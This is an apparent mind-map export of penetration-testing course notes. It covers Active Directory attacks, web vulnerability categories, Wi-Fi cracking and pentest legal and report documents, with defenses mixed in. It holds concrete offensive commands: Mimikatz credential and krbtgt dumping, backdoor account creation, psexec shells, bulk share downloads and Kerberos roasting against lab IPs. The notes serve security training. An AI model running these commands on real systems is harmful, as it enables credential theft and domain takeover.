aclpwn restore
info dump (loot folder)
new user creation on DC
delegate access
Defenses
Other Attack Vectors and Strategies
Disable IPv6
Disable wpad if not in use
Enable LDAP signing and channel binding
Put admin users into the protected users group
Possible unwanted side effects Define Block Rules / instead of Allow Rules
usually not enabled
prevent impersonation or delegation
Day begins with
Early morning
Lunch time
mitm6
Responder
Early morning
Lunch time
Easy win
See how the network responds
Are they giving us hashes ?
Are those hashes easy to crack ?
Easy win
If LMNR is disabled
might have had Pentest before
might know common attacks
Nessus scan
Nmap scan
HTTP_Version (Metasploit)
Use this if scans are taking too long
Sweep entire network for websites
Less likely to be picked-up
Loot at logins Check for default creds
Look for printers might get domain admin off
Scan-to-computer feature
Is user domain admin on that printer ?
dump creds in clear text get passwords for SMB user
using individual user accounts
Lot of people don't secure their printers
Jenkins Instances Often wide open
Check for Vulns
Looking for hashes
Get loot back
Get account created on Domain Controller
Try all possible ways in
Look for SMB open / signing disbled
Pickup targets / hashes for SMB Relay attacks
Morning
Afternoon Relay hashes
Search for low hanging fruits
Think outside the box
Enumerate as much as you can
Don't just focus on the exploit
Initial Attack Vectors
Post-Compromise
Attack
Enumeration
PowerView
Bloodhound
Pass-the-Hash
Pass-the-Password
Dump the Hashes
crackmapexec
Pwn3d!
crackmapexec
Metasploit psexec meterpreter hashdump
no cracking needed
secretsdump
Crack NTLM Hashes Hashcat
SAM Dumping
get a shell
not Pwn3d!
Try get a shell with Psexec
Dump local SAM hashes
no SMB access
Pwn3d! or green [+] Try to authenticate with Psexec
not Pwn3d! no SMB access
LSA Secrets Dumping
DPAPI_SYSTEM KEY
Pass Attack
Limit account re-use
Utilize strong passwords
Privilege Access Management (PAM)
Avoid re-using local admin password
Disable Guest and Administrator accounts
Limit who is a local administrator
The longer the better (>14 characters)
Avoid using common words
I like long sentences
Check out/in sensitive accounts when needed
Automatically rotate passwords on check out and check in
Limits pass attacks as hash/password is strong and costantly rotated
Mitigation
Token Impersonation
Token Impersonation
Cannot pass NTLMv2
Mimikatz
Meterpreter - Incognito
Limit user/group token creation permissions
Account tiering
Local admin restriction
Kerberoasting
GPP / cPassword
Mimikatz
Kerberoasting
Strong Passwords
Least privilege
Request TGT, provide NTLM hash
Receive TGT encrypted with krbtgt hash
Request TGS for Server (Presents TGT)
Receive TGS encrypted with Server's account hash
Crack the hash
GetUserSPNs.py
smb_enum_gpp module in Metasploit
gpp_decrypt
Groups.xml
Invoke-GPP
smbclient
prompt off
recurse on
mget *
cpassword
Golden Ticket
Credential Dumping
Pass-the-Hash
Over-Pass-the-Hash
Pass-the-Ticket
Silver Ticket
privilege::debug
LSA dump
sekurlsa::logonpasswords
ntds.dit
Usernames
NTLM
Logged in accounts
wdigest
lsadump::sam
lsadump::sam /patch
lsadump::lsa /patch
SAM dump
sam dump not working
shell with Metasploit
secretsdump.py
just download the SAM
Passwords
Why do we dump ?
Crack passwords offline
Golden Ticket attack
% we are able to crack
weak password policy
strong password policy
Kerberos Ticket Granting Ticket
crackmapexec
crack with secretsdump.py
windows/system32/config/SAM
windows/system32/config/SECURITY
windows/system32/config/SYSTEM
Pull down krbtgt account
SID
NTLM
lsadump::lsa /inject /name:krbtgt
Golden Ticket
Pass-the-Ticket
Silver Ticket
opens cmd prompt
Access any computer
dir THEPUNISHERc$
PsExec64.exe -accepteula THEPUNISHER cmd.exe shell
psexec.exe
misc::cmd
Stealthier
Features
Persistence
net user hacker password123 /add
run scheduleme
run schtaskabuse
run persistence -h
exploit/windows/local/persistence
exploit/windows/local/registry_persistence
Metasploit
proxychains
SSH Pivoting
psexec
run autoroute -s 169.254.0.0/24
run autoroute -p
connect to target
route print
ipconfig
arp -a
use auxiliary/scanner/portscan/tcp
poc
Wi-Fi
WPA2 PSK
WPA2 Enterprise
Assetfinder
Amass
./run.sh tesla.com
HTTProbe
Screenshot Websites
GoWitness
Subdomain takeover
Subjack
Scraping Wayback data
Waybackurls
Enumeration
Users Enumeration
nmap --script=smb-enum-users.nse
GetADUsers.py -dc-ip 10.10.10.161 htb.local/
kerbrute userenum --dc 10.10.222.155 -d spookysec.local usernames.txt -t 100
Attempt to list and get TGTs for those users that
have the property “D
o not requi re Kerberos
preauthenti cati on” set (UF_D
O
N
T_REQ
U
I R
E_PR
EA
UTH
)
GetNPUsers.py -dc-ip 10.10.10.161 htb.local/
Get TGT hash, for those users with such configuration GetNPUsers.py -request -dc-ip 10.10.10.161 htb.local/
Hashcat
John the Ripper
Get a shell
Evil-winrm
psexec
Brute force discovery of users, passwords and password spray
Kerbrute
Metasploit auxiliary/gather/kerberos_enumusers
Exploiting Kerberos GetNPUsers.py
ASREPRoasting
Get Hashes
Shares Enum smbclient
Crack the hashes
Elevate Privileges Secretsdump
NTDS.DIT
secrets dump
Pass-the-Hash
psexec
evil-winrm
Get system shell
Easy-win Strategy
crackmapexec check where you can authenticate
Abuse WriteDACL permissions
ntlmrelayx
PowerView
SQL Injection
Broken Authentication
Cross-Site Scripting (XSS)
XML External Entities (XXE)
Security Misconfiguration
OWASP Top Ten
Sensitive Data Exposure
Broken Access Control
Insecure Deserialization
Using Components with Known Vulnerabilities
Insufficient Logging & Monitoring
dirbuster
BurpSuite
nmap
Search for 'key' 'keys' 'password' 'passw'
Response tab navigate all directories
Response Headers
HTTP Strict Transport Security (HSTS)
https://securityheaders.com
nmap --script=ssl-enum-ciphers -p 443 tesla.com
Session Fixation
Credential Stuffing
Brute Forcing or other automated attacks
Weak or well-known Passwords
Weak or Ineffective Credential Recovery
Weak forgot-password processes
Missing or Ineffective two-factor authentication
Session ID exposed in URL
knowledge-based answers
Does not rotate Session ID after successful login
Dows not properly invalidate Session IDs during logout or inactivity
User Sessions or Authentication Tokens
Find all directories
Parameterized Statements
Sanitized Input
Blind SQL Injection
Attacking Systems that parse XML Input
Abuse SYSTEM entity and get malitious
dos, local file disclosure, remote code execution, and more
User gets access to somewhere they shouldn't
Are you able to bypass access ?
unauthenticated, authenticated, admin
Can you access admin areas or even other user areas from an account ?
IDOR - Insecure Direct Object Reference
Default Credentials
Stack Traces - Error Handling
Unnecessary features
Out-of-date Software
Unnecessary ports open, activated accounts
Disclosure of Sensitive Information
Application should not throw errors
Left behind applications
Default features not in use
Deprecated Interface
File upload
Left behind directories
Reflected XSS
Stored XSS
DOM XSS
Client-side
Server-side
Preventing XSS
Encoding
Filtering
Validating
Sanitization
Serialization
Deserialization
ysoserial
No Patching, no fix, no update
Software is vulnerable, unsuported, or out of date
No frequent scan for vulnerabilities
Have Logs, Auditable Events
Track anyone logging into the application
Track failed login attempts
Monitor if anyine is attacking your application
Serialization
Walk around
Rogue Devices
Guest Network
No password
Separation of networks
Reduced funtionalities
Access Employs' things / IPs / servers
How well is the network segmented
Hacking Process
Place wireless card in monitor mode
Discover info about network
Select network and capture data
Perform Deauth attack
Capture WPA handshake
Attempt to crack the handshake
Strength evaluation
Channel
BSSID
Speed-up the process
WPS
Company Name
Phone numbers
Street address
Create a wordlist from thei website
WPA2 PSK
Substitute 1 with i. 0 with O
Many companies use
something familiar to them
CEWL
Weak Passwords
rockyou.txt
Channel 1, 6 and 11 are the most used
(no overlap)
SSID
Open network
Hidden networks
Evaluate what networks are around
Legal Documents
and Report Writing
Sales
https://www.youtube.com/watch?v=EOoBAq6z4Zk
'How to' video
on writing a pentest report
https://github.com/hmaverickadams/TCM-Security-Sample-Pentest-Report Sample Pentest Report
https://github.com/trustedsec/physical-docs
Legal Documentation
for Physical Security Testing
scylla.sh
leakedsource.ru
scylla.sh
email:*bbc.co.uk
email:username*
Before you test
After you test
Rules of Engagement (ROE)
Findings Report
Mutual Non-Disclosure Agreement (NDA)
Master Service Agreement (MSA)
Statement of Work (SOW)
Others: Sample Report, Recommendation Letters etc..
Common Legal Documents
Performance Objectives
Outline the Responsabilities
Rapid7 MSA example
https://www.rapid7.com/legal/msa/
Activities
Deliverables
Timelines
Quotation
What we can and can't do
What we can and can't attack (IP addresses)
Will cover specifics of you testing
Common 'don'ts'
Denial of Service
Social Engineering
often set aside as its own assessment
unless that's a specific thing the client wants to test
You can not start your penetration test until the Rules of Engagement document is signed
It's Snapshot in time
Assessment Overview
(high level)
Assessments Components
We are not responsible for
anything happening after
We are under a time limited engagement
We are targeting what we can in that period of time
What we are attacking
What type of penetration test it is
Timeframe
Guidelines
Phases of Pentest
Planning
Discovery
Attacking
Reporting
Findings Severity Ratings
Scope
Scope Exclusions
No Denial of Service attacks
IPs
Client Allowances
Executive Summary
Technical Summary
Did the client had to assist us in any way ?
C-level executive
CISO
CEO
Intended for people with no technical background
Share technical details
Intended for technical people
Attack Summary
Quick summary about vulnerabilities you found,
and what they could lead to
Actions
Recommendations
What you managed to do
Security Strengths
Security Weaknesses
Give them kudos where they need it
We were scanning
they identified and blocked us
Missing Multi-Factor Authentication
Weak Password Policy
Unrestricted Logon Attempts
Identify weaknesses at a high level
No-technical people will understand
Charts
Vulnerabilities by Impact
Exploitation Proof of Concept
Chained exploit of attacks
References
Remediation
Who
Vector
Action
Additional Reports and Scans (Informational)